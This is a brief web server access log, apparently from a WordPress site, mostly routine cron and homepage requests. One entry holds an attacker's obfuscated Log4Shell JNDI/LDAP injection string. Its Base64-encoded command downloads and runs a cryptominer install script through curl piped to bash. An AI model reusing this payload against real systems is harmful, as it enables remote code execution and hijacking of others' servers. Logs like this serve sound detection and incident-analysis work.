80.75.212.83 - - [04/Oct/2025:23:47:03 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [04/Oct/2025:23:53:50 +0800] "POST /wp-cron.php?doing_wp_cron=1759593230.1517379283905029296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [04/Oct/2025:23:53:50 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:23:56:55 +0800] "POST /wp-cron.php?doing_wp_cron=1759593415.2723789215087890625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [04/Oct/2025:23:56:55 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"